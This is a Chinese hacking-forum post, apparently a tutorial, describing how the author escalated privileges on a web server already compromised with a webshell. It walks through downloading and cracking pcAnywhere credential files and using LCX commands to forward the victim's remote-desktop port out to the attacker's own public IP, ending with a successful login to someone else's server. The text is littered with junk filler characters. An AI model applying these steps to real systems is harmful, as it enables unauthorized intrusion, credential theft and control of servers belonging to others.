  
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。9 \" s- \! A$ ?
# S2 k7 L1 h% {0 C/ k% R2 y$ @提权方法:pcanywhere+LCX
, B1 U$ d" J g- A% i
0 v/ e X: a: Q/ c9 ~获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。3 J( X8 d, X" A% X4 X* D2 s1 \
; u0 N+ W" C; K1 H {6 Q- K
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
R. E& H1 ?2 H# z v0 x1 L8 E4 F z5 z
& S: |% J) @; D5 [. o8 ~: ^+ L
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。8 }8 A( ~* \: |
N9 Z" F' |7 O6 l% ?3 u1 i
4 A5 o7 B$ h; Q' W9 l
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
) Y& l* ^9 G; { K3 z4 v* W- R6 I# w5 P& r
- y% p7 ]! S9 k2 N( h6 `
9 h7 v: H: u( L4 b4 Y2 y
4 r# c) A7 _) G# E由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``! X5 s' M) ~% X
9 `2 z6 U6 S# n6 J, E- s
2 S7 C( T E7 _7 [6 y
LCX的用法再简单说下:* F" o" h: I( I
# |6 O' D% f/ S+ v3 E1 V
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)3 d# m6 v( D: C: Q. \$ l" [
A* w+ a- n8 F; \* U2 z
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)5 M, C( C" i: k& S' h% a
! [5 v" H3 N" g- K$ L' n由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
/ S- G; ?( Z/ b, U9 c2 s1 r顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``: j8 Q. ~2 w1 o( U
) p: s! ?* S3 I* v! T0 k
( N) N9 ~% o H# l. U9 @1 ?4 G' J6 R* j: S; {8 c; ^
- R. h' q- ~& c; _9 i
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
( z+ ^9 @' A$ g+ |1 E! Q. F9 c! d% c8 H
; g1 ~& N7 G; g
q/ O( L, k# n8 n% _/ m& a( H! _$ w+ q2 |' @
我们本地连接试试,输入我们刚破解的账号密码9 Z# A+ t& k! Q8 a
& Q8 n0 O. f- i. b
5 F0 T5 h& R5 f% t2 e& h, `( a呵呵``连接成功,服务器不错,又一个8核^︵^( u( W7 Q3 ]- F: J7 B' h4 f L
8 z1 x; A3 ?7 q' L/ P5 Y- l) O8 k. {+ {
/ U- o+ ^ r* r
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|